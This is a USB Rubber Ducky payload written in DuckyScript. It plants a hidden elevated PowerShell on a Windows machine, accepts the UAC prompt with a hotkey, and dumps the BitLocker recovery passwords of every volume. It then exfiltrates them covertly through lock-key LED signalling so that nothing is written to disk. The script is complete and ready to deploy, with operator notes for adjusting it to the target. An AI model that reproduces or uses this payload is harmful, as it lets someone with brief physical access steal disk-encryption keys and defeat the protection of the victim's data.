Path: blob/master/payloads/library/credentials/BitLockerKeyDump/payload.txt
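REM BitLockerKeyDump
REM Version 1.0
REM OS: Windows
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM
REM This PowerShell payload reads the BitLocker recovery password(s) of the
REM target's volumes (Get-BitLockerVolume, run from an elevated shell) and
REM exfiltrates them over the keyboard lock-key LEDs (Keystroke Reflection),
REM so nothing is written to the target's disk.
REM
REM Flow: PASSIVE_WINDOWS_DETECT decides whether the host is Windows ->
REM elevate through the Run dialog (CTRL-SHIFT ENTER) and a UAC "Yes" hotkey ->
REM dump the keys -> Windows_Fileless_HID_Exfil() -> Detect_Finished() blinks
REM CAPSLOCK and switches the HID interface off.
REM
REM Operator notes (review):
REM  * #YES_SHORTCUT is the UAC accept hotkey and is locale dependent
REM    (ALT j for a German UI, ALT y for English); set it for the target.
REM  * The elevation step raises a UAC consent prompt on the target, which is
REM    visible to a logged-in user.
REM  * WAIT_FOR_CAPS_CHANGE has no timeout: if the UAC prompt is declined or the
REM    session is not an administrator, the payload stalls at that point.

REM Extension by Korben: passively check whether the target is a Windows host
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS detection and passive detect-ready.
Includes its own passive detect-ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here).
Place at the beginning of the payload (besides ATTACKMODE) to act as a dynamic
boot delay.
$_OS will be set to WINDOWS or NOT_WINDOWS.
See the end of the payload for usage within the payload.
END_REM

REM CONFIGURATION:
REM At most #MAX_WAIT * #CHECK_INTERVAL ms are spent waiting for the host to
REM answer the lock-LED report before detection gives up.
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
REM A host that issued more than this many configuration requests is treated as Windows.
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

REM Poll until the host has replied to the lock-LED report or the budget is used up.
VAR $MAX_TRIES = #MAX_WAIT
WHILE (($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
    DELAY #CHECK_INTERVAL
    $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
    $_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
    STRING HELLO WINDOWS!
ELSE
    STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

REM Extension by 0i41E to signal the end of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0i41E

REM_BLOCK DOCUMENTATION
USAGE:
Call Detect_Finished() to signal that your payload has finished executing.
It blinks CAPSLOCK an even number of times when the lock is off (4 toggles)
and an odd number when it is on (3 toggles), so the host is always left with
CAPSLOCK off, then switches the device to ATTACKMODE OFF.
END_REM

REM CONFIGURATION:
REM Pause between the CAPSLOCK toggles, in ms.
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
    REM Fix: the original used IF without THEN and a condition-less ELSE IF;
    REM the rest of this file writes IF ... THEN / ELSE, so use that form here too.
    IF ($_CAPSLOCK_ON == FALSE) THEN
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        ATTACKMODE OFF
    ELSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        ATTACKMODE OFF
    END_IF
END_FUNCTION
END_EXTENSION

REM Extension by 0i41E for fileless exfiltration via the lock keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0i41E

REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB-HID-only data exfiltration and is based on Hak5's original method.

TARGET:
Windows hosts that support PowerShell and SendKeys

USAGE:
Type out your command or script in PowerShell, but do not execute it yet (just
type it with STRING), then call Windows_Fileless_HID_Exfil() right after it.
The function pipes the command's output into a variable, encodes it as lock-key
presses and lets the host "type" it back to the Ducky.

Encoding: every character is sent MSB-first as 8 lock-key presses, NUMLOCK for
a 1 bit and CAPSLOCK for a 0 bit; a final SCROLLLOCK marks the end of the data.
The % in the SendKeys strings is the SendKeys ALT modifier.

Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM

FUNCTION Windows_Fileless_HID_Exfil()
    DELAY 250
    REM Remember the host's lock-key state so it can be put back after the transfer.
    SAVE_HOST_KEYBOARD_LOCK_STATE
    $_EXFIL_MODE_ENABLED = TRUE
    $_EXFIL_LEDS_ENABLED = TRUE
    DELAY 500
    REM Append a pipe to the command already typed: capture its output as $DD.
    STRING |Out-String|Set-Variable -Name "DD";
    REM Encode the output as lock-key presses (see DOCUMENTATION above).
    STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
    REM Let the host replay the presses; the Ducky reads them back from the LED reports.
    STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
    REM The trailing SCROLLLOCK press signals that the transfer is complete.
    WAIT_FOR_SCROLL_CHANGE
    LED_G
    $_EXFIL_MODE_ENABLED = FALSE
    RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION

REM Hotkey that accepts the UAC prompt: ALT j (German UI), ALT y (English UI).
REM Locale dependent - adjust this for the target before deploying.
DEFINE #YES_SHORTCUT ALT j

REM Only run the payload when the host was detected as Windows.
IF ($_OS == WINDOWS) THEN
    GUI r
    DELAY 500
    REM Elevated one-liner: toggle CAPSLOCK as an "I am running as admin" signal,
    REM then start a hidden PowerShell that receives the commands typed below.
    STRING powershell -nop -c "Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait('{CAPSLOCK}');powershell.exe -nop -w h"
    DELAY 250
    REM CTRL-SHIFT ENTER in the Run dialog launches the command elevated (UAC).
    CTRL-SHIFT ENTER
    REM Generous delay so the UAC prompt is on screen before the hotkey is sent.
    DELAY 2000
    REM Accept the UAC prompt.
    #YES_SHORTCUT
    REM The CAPSLOCK toggle only happens if elevation succeeded.
    REM NOTE(review): this wait is unbounded; a declined prompt or a non-admin
    REM session leaves the payload stuck here.
    WAIT_FOR_CAPS_CHANGE
    DELAY 1500
    REM Dump the recovery password of every volume that has one
    REM (the length check skips volumes without a recovery key protector).
    STRING Get-BitLockerVolume|ForEach-Object{$drive = $_.MountPoint;$Key = [string]($_.KeyProtector).RecoveryPassword;if ($Key.Length -gt 5){Write-Output ("$drive Drive - Recovery Key: $Key")}}
    REM Exfiltrate the keys via Keystroke Reflection.
    Windows_Fileless_HID_Exfil()
    DELAY 150
    Detect_Finished()
REM Not Windows...
ELSE
    DELAY 500
    REM ... with CAPSLOCK on: present the Ducky as mass storage (exposes the
    REM device storage, and therefore this payload, to the host) ...
    IF ($_CAPSLOCK_ON == TRUE) THEN
        ATTACKMODE STORAGE
    REM ... with CAPSLOCK off: flash red and stay in ATTACKMODE OFF.
    ELSE
        LED_RED
        DELAY 1000
        LED_OFF
        ATTACKMODE OFF
    END_IF
END_IF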